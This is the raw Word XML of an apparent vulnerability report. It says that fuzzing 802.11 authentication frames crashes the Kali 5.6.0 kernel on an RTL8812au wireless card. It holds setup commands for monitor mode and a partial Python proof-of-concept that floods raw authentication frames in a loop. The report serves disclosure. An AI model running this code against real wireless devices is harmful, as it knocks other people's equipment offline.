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jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">The Fuzz </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>results in the Kali kernel Crash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Vulnerability Overview</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 xml:space="preserve">Based on the internal Fuzz test platform Zsniffer, compile the WIFI Authentication status model, and perform Fuzz test on its field variation, which causes the kernel Crash and the NIC down to drop. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Affected Version</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Kali kernel version: 5.6.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Environment Building</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(1) Environment Information</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Operating system: Kali</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Kernel version: Linux kali 5.6.0-kali2-amd64 #1 SMP Debian 5.6.14-1kali1 (2020-05-25) x86_64 GNU/Linux</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Wireless NIC chip type: RTL8812au</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Python version: 2.7.18</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(2) Environment Building</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Use a router based on the Qualcomm X55 platform to start the router. Connect the kali system as a client to the wireless NIC. The following shows the NIC Wlan0:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="3804920"/>
            <wp:effectExtent l="0" t="0" r="4445"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72405" cy="3804920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Vulnerability Reproduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(1) Enables the monitoring mode.</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ip link set wlan0 down</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iw dev wlan0 set type monitor</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ip link set wlan0 up</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The parameters are as follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="2967355"/>
            <wp:effectExtent l="0" t="0" r="5080" b="444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5271770" cy="2967355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(2) Some POC contents are as follows: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AP_MAC = "00:22:66:88:22:00"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STA_MAC = "00:13:ef:f1:04:ef"</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ETH_P_ALL = 3</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IFACE = "wlan0"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def mac2str(mac):</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 xml:space="preserve">    return "".join(map(lambda x: chr(int(x, 16)), mac.split(":")))</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"\x24\x00"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"\x2f\x40\x00\xa0"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"\x20\x08\x00\x00"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"\x00\x00\x00\x00"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"\x27"</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"\x43"</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"\x6e\x25"</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"\xa0\x00"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"\x10\x02"</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"\x6c\x09"</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"\xa0\x00"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"\xd0\x00"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"\xd0"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RADIO += "\x00"</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RADIO + "\xB0"  # Type/Subtype</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"\x08"  # Flags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"\xc3\x50"  # Duration ID</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mac2str(AP_MAC)  # Desti8nation address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mac2str(STA_MAC)  # Source address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mac2str(AP_MAC)  # BSSID</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"\x00\x00"  # Sequence control</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"\x00\x00"  # Authentication algorithm (open)</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"\x01\x00"  # Authentication sequence number</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"\x00\x00"  # Authentication status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"\x1f\xd8"  # Authentication status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AUTH_REQ_OPEN += "\x5a\x07"  # Authentication status</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AUTH_REQ_HDR = AUTH_REQ_OPEN[:-6]</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def start_fuzz():</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s  = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ALL))</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s. Bind((IFACE, ETH_P_ALL))</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 xml:space="preserve">    while True:</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s. Send(AUTH_REQ_OPEN)</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r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        print("send msg",AUTH_REQ_OPEN)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="480" w:lineRule="exact"/>
        <w:ind w:left="363" w:firstLine="0"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Reproduction Result</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 xml:space="preserve">After using the wireless NIC of the chip type RTL8812au for the test, we find that the NIC is down. After the test on the status of 802.11 protocol authentication not establishing connection, it is found that the wireless NIC is down. According to a preliminary analysis, this problem is caused by the kernel Crash. </w:t>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The following figure shows the fault.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4133215" cy="1428750"/>
            <wp:effectExtent l="0" t="0" r="635"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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4133215" cy="14287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 xml:space="preserve">At the same time, Wireshark cannot continue to capture packets because the NIC is down. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="3224530"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1397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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5271135" cy="322453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adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">By viewing the information of the kernel invocation link, the following error logs are reported. According to the analysis, it is the kernel Crash that causes the NIC to be down. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5263515" cy="2251710"/>
            <wp:effectExtent l="0" t="0" r="13335" b="1524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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5263515" cy="2251710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Attachments:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1025" o:spt="75" type="#_x0000_t75" style="height:42.75pt;width:72pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId13" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1468075725" r:id="rId12">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:objec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541" w:yAlign="top"/>
      <w:rPr>
        <w:rStyle w:val="8"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="8"/>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
      <w:t>Page</w:t>
    </w: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ind w:right="360"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>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distribute"/>
      <w:rPr>
        <w:rFonts w:eastAsia="华文仿宋"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:cs="宋体"/>
        <w:color w:val="000000"/>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="margin">
            <wp:posOffset>-46990</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>278130</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="5387975" cy="52070"/>
          <wp:effectExtent l="19050" t="0" r="317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rcRect/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="5387975" cy="52070"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="9525">
                    <a:noFill/>
                    <a:miter lim="800000"/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>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6E4C7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6DA6E4C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17114"/>
    <w:rsid w:val="00092939"/>
    <w:rsid w:val="00126145"/>
    <w:rsid w:val="001767E6"/>
    <w:rsid w:val="00190A8D"/>
    <w:rsid w:val="001B21A1"/>
    <w:rsid w:val="002333B7"/>
    <w:rsid w:val="00244D42"/>
    <w:rsid w:val="002D35FA"/>
    <w:rsid w:val="00312C1A"/>
    <w:rsid w:val="00312DD1"/>
    <w:rsid w:val="0033176D"/>
    <w:rsid w:val="003504B5"/>
    <w:rsid w:val="003A2A06"/>
    <w:rsid w:val="003F58F6"/>
    <w:rsid w:val="00413229"/>
    <w:rsid w:val="00427917"/>
    <w:rsid w:val="0046088D"/>
    <w:rsid w:val="0048006F"/>
    <w:rsid w:val="004C63EE"/>
    <w:rsid w:val="004C7BFA"/>
    <w:rsid w:val="004D79CC"/>
    <w:rsid w:val="0051029C"/>
    <w:rsid w:val="005D680C"/>
    <w:rsid w:val="005F56A6"/>
    <w:rsid w:val="00620346"/>
    <w:rsid w:val="00690BB8"/>
    <w:rsid w:val="006C60A2"/>
    <w:rsid w:val="006D7CA8"/>
    <w:rsid w:val="00763814"/>
    <w:rsid w:val="00771468"/>
    <w:rsid w:val="00793203"/>
    <w:rsid w:val="00796A2A"/>
    <w:rsid w:val="007A2A69"/>
    <w:rsid w:val="007C2C21"/>
    <w:rsid w:val="007C33E4"/>
    <w:rsid w:val="007E771D"/>
    <w:rsid w:val="00872250"/>
    <w:rsid w:val="0096003B"/>
    <w:rsid w:val="00971DDC"/>
    <w:rsid w:val="00992DCD"/>
    <w:rsid w:val="009D6233"/>
    <w:rsid w:val="009E748B"/>
    <w:rsid w:val="00A22250"/>
    <w:rsid w:val="00A95088"/>
    <w:rsid w:val="00AC4276"/>
    <w:rsid w:val="00AE7865"/>
    <w:rsid w:val="00B12666"/>
    <w:rsid w:val="00C50168"/>
    <w:rsid w:val="00D85273"/>
    <w:rsid w:val="00DA12AB"/>
    <w:rsid w:val="00E153F6"/>
    <w:rsid w:val="00E26FED"/>
    <w:rsid w:val="00E43842"/>
    <w:rsid w:val="00E943EE"/>
    <w:rsid w:val="00F01A21"/>
    <w:rsid w:val="00F204EA"/>
    <w:rsid w:val="00FF0AAD"/>
    <w:rsid w:val="09080CDA"/>
    <w:rsid w:val="0CDE1561"/>
    <w:rsid w:val="119B1FF4"/>
    <w:rsid w:val="14E17114"/>
    <w:rsid w:val="1D1A70DA"/>
    <w:rsid w:val="248E698C"/>
    <w:rsid w:val="2671307F"/>
    <w:rsid w:val="2805170C"/>
    <w:rsid w:val="2DD21AFC"/>
    <w:rsid w:val="2EEA5313"/>
    <w:rsid w:val="30605155"/>
    <w:rsid w:val="3729557C"/>
    <w:rsid w:val="3E0D162E"/>
    <w:rsid w:val="44C70D28"/>
    <w:rsid w:val="4BAD5B9B"/>
    <w:rsid w:val="4C261319"/>
    <w:rsid w:val="5363569C"/>
    <w:rsid w:val="540A5C7D"/>
    <w:rsid w:val="5519198B"/>
    <w:rsid w:val="6860094C"/>
    <w:rsid w:val="69797C2C"/>
    <w:rsid w:val="6E074CDD"/>
    <w:rsid w:val="74E35B52"/>
    <w:rsid w:val="759B6420"/>
    <w:rsid w:val="76F02AF0"/>
    <w:rsid w:val="77C46BC5"/>
    <w:rsid w:val="7D9E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name="header"/>
    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0"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0"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="footer"/>
    <w:basedOn w:val="1"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs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customStyle="1" w:styleId="10">
    <w:name w:val="批注框文本 字符"/>
    <w:basedOn w:val="7"/>
    <w:link w:val="4"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="11">
    <w:name w:val="命令行"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl/>
      <w:pBdr>
        <w:top w:val="dotted" w:color="auto" w:sz="4" w:space="0"/>
        <w:left w:val="dotted" w:color="auto" w:sz="4" w:space="0"/>
        <w:bottom w:val="dotted" w:color="auto" w:sz="4" w:space="0"/>
        <w:right w:val="dotted" w:color="auto" w:sz="4" w:space="0"/>
      </w:pBdr>
      <w:wordWrap w:val="0"/>
      <w:spacing w:line="300" w:lineRule="atLeast"/>
      <w:ind w:left="1247"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="DotumChe" w:hAnsi="DotumChe" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="12">
    <w:name w:val="Default Paragraph Font 2"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="1"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="13">
    <w:name w:val="page number 2"/>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1</Pages>
  <Words>0</Words>
  <Characters>0</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>845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2020-10-22T09:07:00Z</dcterms:created>
  <dc:creator>10206171</dc:creator>
  <cp:lastModifiedBy>10206171</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-28T02:39:01Z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